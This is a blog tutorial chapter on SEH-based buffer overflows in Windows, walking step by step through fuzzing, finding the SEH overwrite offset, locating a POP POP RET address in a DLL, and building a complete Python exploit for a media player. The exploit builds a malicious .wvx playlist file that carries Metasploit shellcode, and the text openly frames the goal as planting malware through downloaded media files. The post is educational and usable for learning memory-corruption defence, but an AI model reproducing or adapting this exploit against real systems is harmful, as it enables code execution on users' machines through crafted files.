Post List

Sunday, November 18, 2018

28.Python SEH Based Buffer Overflow


28. SEH Based Buffer Overflow

28.1 Introduction

28.1.1 The Basic Concept of SEH

First, let’s discuss the concept of the SEH (Structured Exception Handler). SEH is an exception handling mechanism that is provided by the Windows operating system. It uses a chain structure that is associated with a linked list.


 Figure 28-1 Behavior of the SEH chain

If an exception occurs, the operating system handles the exception by following the SEH chain. If there is a function that can handle the exception, it is sequentially executed. If there is not, the process is skipped. Next the SEH at the end of the chain points to”0xFFFFFFFF”, which will pass the exception handling to the kernel. Th SEH solves a practical problem in that all exceptions cannot be handled at the developer level and the application can therefore operate more reliably.

Windows 7 has developed a variety of techniques to block buffer overflow attacks utilizing SEH. The first is the “CPU Zeroing” technique that initializes the value of all the registers to zero when the SEH is called. As mentioned earlier, simply executing a “JMP ESP” instruction is not sufficient any more to successfully hack the system. The second is an “SEHOP” (Structured Exception Handler Overwrite Protection) technique that validates before moving to the next SEH Handler address. The last is a “SafeSEH” technique that limits the addresses that can be used as Exception Handler addresses. If all three techniques that are mentioned above are implemented, it becomes very difficult to hack using a buffer overflow attack. Briefly, let's find a way to successfully hack a system by bypassing the security technology that is implemented in Windows 7 in order to learn about the SEH Buffer Overflow techniques.

28.1.2 Basic Concepts of the SEH Buffer Overflow

 Figure 28-2 Behavior of the SEH Chain

When an exception occurs, the EXCEPTION_DISPOSITION Handler structure used for exception handling is placed at the top of the stack. The second item of this structure contains the address that points to the next SEH. The core of the SEH buffer overflow attack is to take advantage of the characteristics of this structure. The detailed operation is as follows.

(1) EXCEPTION_DISPOSTION Handler: Place the structure that is used for exception handling into the stack.

(2) Running SEH: The operating system runs the Opcode in the address to which the SEH points. Set the input value in advance to make the SEH have an address that points to the “POP POP RET” instruction.

(3) Runnig POP POP RET: Remove the top two values ​​from the stack and execute the third value. The “44 BB 00 00” value corresponds to the next SEH address that is set at the time that the exception was generated by the operating system.

(4) Running JMP: Execute the command to jump by 6 bytes.

(5) Running Shell Code: Finally, run the shell code you entered for hacking.

Now that you have learned all the basic knowledge for an SEH buffer overflow attacks. Let's try to make the code for the SEH buffer overflow attack in Python.

28.2 Fuzzing and Debugging

First, generate an application error through fuzzing, by writing the hacking code step by step by using the debugger. Try to make Python code with the basic concepts that were previously mentioned.

 Figure 28-3 Hacking Procedures

The general procedure is similar to that for a stack-based buffer overflow. However, the SEH instead of the EIP is overwritten for the hacking attempt. Fuzzing allows you to find how much data will be required to overwrite the SEH. The debugger can be used to find the address of the “POP POP RET” instruction, and this address must be entered for the location of the SEH. If you enter a hex code that corresponds to the “short jmp” command into the next SEH, the development of the “Adrenalin” executable file that runs shell code entered by the user is then completed. Now, you are ready to plant malware on the user PC by downloading multimedia files from the Internet.
Sample code and the test application can be downloaded from “http://www.exploit-db.com/exploits/26525/” site. The debugger uses the bufferOverflowTest.py without changes. Just enter the “BlazeDVD.exe” instead of “Play.exe” as the “processName” variable. Now when you install the downloaded application, the test preparation has been completed.

junk=”\x41”*2500
x=open(‘Exploit.wvx’, ‘w’)
x.write(junk)
x.close()

The behavior of this example is similar to that for fuzzingBlazeDVD.py. First, create an Adrenalin executable file consisting of consecutive “A” characters of any length. Run the Adrenalin player and bufferOverflowTest.py, and the debugging for the player is then ready. Finally, generate an error when opening the file “Exploit.wvx” through the player, and the debugger will output the following results on the screen.

 Figure 28-4 fuzzing test Result

The example in the previous chapter concerned the EIP register, and the contents of interest are in the SEH. Let's take a look at “SEH unwind” at the end. For the fuzzing test, you can confirm the value that has been entered in the “Exploit.wvx” file. Now what you need to do is to find out whether you can overwrite SEH as an input value of a given length.

28.3 SEH Overwrite

In order to generate a string with certain rules, let's check the number of characters that can be used to overwrite the SEH. The characters from “a” to “z” and from “0” to “9” intersect horizontally and vertically and can be used to create a string. 


Create the “Exploit.wvx” file by running the program, and then run it through the Adrenalin program. It is possible to monitor the error status in the debugger. Now, let's take a look at the “SEH unwind” part because we must overwrite the SEH. The first part is the “next SEH”, and the next part corresponds to “SEH”.

 Figure 28-5 Debugging Result

You can see “33313330” and “33333332” on the screen. The decode command can be used to change these into a string to confirm that they correspond to “3031” and “3233”. “3031” corresponds to the 2,140th string. Therefore, enter the dummy string until 2140th position, and then put the address corresponding to the “POP POP RET” command.

28.4 Find the “POP POP RET” Instruction

It is not easy to find the corresponding command with the “pydbg” module. For convenience, download the debugger from the following site “http://www.ollydbg.de/download.htm”. Unzip the downloaded file and use the debugger without performing an installation. After running the Adrenalin player first, run Ollydbg. Let's use the “attach” function from the Ollydbg “File” menu. Find “Play.exe” and attach it.

 Figure 28-6 Attach the Executable File

The debugger shows the state of the memory and the registers of the process on the screen. Now, let's check the execution module information that is contained in the memory. Select the executable modules from the “View” menu. This shows information related to all modules used in “Play.exe”.

 Figure 28-7 View Modules

Previously, I explained that Windows 7 has many security features to prevent hacking. In order to view the detailed information we need inspect, it is necessary to install an additional plug-in. In general, since there are many vulnerabilities in the DLLs of applications other than the DLLs defined in the Windows directory, the “AdrenalinX.dll” file is selected here to try to search for the “POP POP RET” instruction.

Double-click the DLL and then click the right mouse button to see the “Search for a Sequence of Commands” menu. When you type the instructions that are shown in the following figure, you can find the start address for the instructions. When you search for an address, you must exclude the addresses that include characters such as “00”, “0A”, “0D”.

 Figure 28-8 Find Instructions

Let's continue the search until you find a valid address to hack. Since the address on the front part contains “00”, let us start the search after moving to the second half. It is therefore possible to obtain the following results.

 Figure 28-9 Finding Instruction result

28.5 Executing the Attack

Now we can complete the hacking program. 2,140 bytes for the front part are filled with a particular character, the next SEH part is entered as hex code to jump by only 6 bytes. In the SEH part, enter the start address for the “POP POP RET” instruction. Finally, paste the shell code to run the Windows Calculator program.

junk="\x41"*2140  
junk+="\xeb\x06\x90\x90"#short jmp
junk+="\xcd\xda\x13\x10"#pop pop ret ***App Dll***
#Calc shellcode from msf (-b '\x00\x0a\x0d\x0b')
junk+=("\xd9\xc8\xb8\xa0\x47\xcf\x09\xd9\x74\x24\xf4\x5f\x2b\xc9" +
"\xb1\x32\x31\x47\x17\x83\xc7\x04\x03\xe7\x54\x2d\xfc\x1b" +
"\xb2\x38\xff\xe3\x43\x5b\x89\x06\x72\x49\xed\x43\x27\x5d" +
"\x65\x01\xc4\x16\x2b\xb1\x5f\x5a\xe4\xb6\xe8\xd1\xd2\xf9" +
"\xe9\xd7\xda\x55\x29\x79\xa7\xa7\x7e\x59\x96\x68\x73\x98" +
"\xdf\x94\x7c\xc8\x88\xd3\x2f\xfd\xbd\xa1\xf3\xfc\x11\xae" +
"\x4c\x87\x14\x70\x38\x3d\x16\xa0\x91\x4a\x50\x58\x99\x15" +
"\x41\x59\x4e\x46\xbd\x10\xfb\xbd\x35\xa3\x2d\x8c\xb6\x92" +
"\x11\x43\x89\x1b\x9c\x9d\xcd\x9b\x7f\xe8\x25\xd8\x02\xeb" +
"\xfd\xa3\xd8\x7e\xe0\x03\xaa\xd9\xc0\xb2\x7f\xbf\x83\xb8" +
"\x34\xcb\xcc\xdc\xcb\x18\x67\xd8\x40\x9f\xa8\x69\x12\x84" +
"\x6c\x32\xc0\xa5\x35\x9e\xa7\xda\x26\x46\x17\x7f\x2c\x64" +
"\x4c\xf9\x6f\xe2\x93\x8b\x15\x4b\x93\x93\x15\xfb\xfc\xa2" +
"\x9e\x94\x7b\x3b\x75\xd1\x7a\xca\x44\xcf\xeb\x75\x3d\xb2" +
"\x71\x86\xeb\xf0\x8f\x05\x1e\x88\x6b\x15\x6b\x8d\x30\x91" +
"\x87\xff\x29\x74\xa8\xac\x4a\x5d\xcb\x33\xd9\x3d\x0c")
x=open('Exploit.wvx', 'w')
x.write(junk)
x.close()

Open the “Exploit.wvx” file that was obtained by running fuzzingAdrenalin.py with the Adrenalin program. Then, you can see the following results after running the Windows Calculator program.

 Figure 28-10 SEH Based Buffer Overflow Result

Windows 7 can also effectively block the SEH-based buffer overflow attack. As was previously described, you can use the “SafeSEH ON” option when compiling the program, and the most important keywords for hacking are vulnerabilities. After discovering vulnerabilities by analyzing the system, the hacker can attempt to attack the system. The first step to produce a safe program is to follow the security recommendations provided by the vendor.



No comments:

Post a Comment

27.Python Stack-Based Buffer Overflow

27.1 Introduction   Figure 27-1 Stack Based Buffer Overflow Basic Concept Stack-based buffer overflow techniques takes advantage...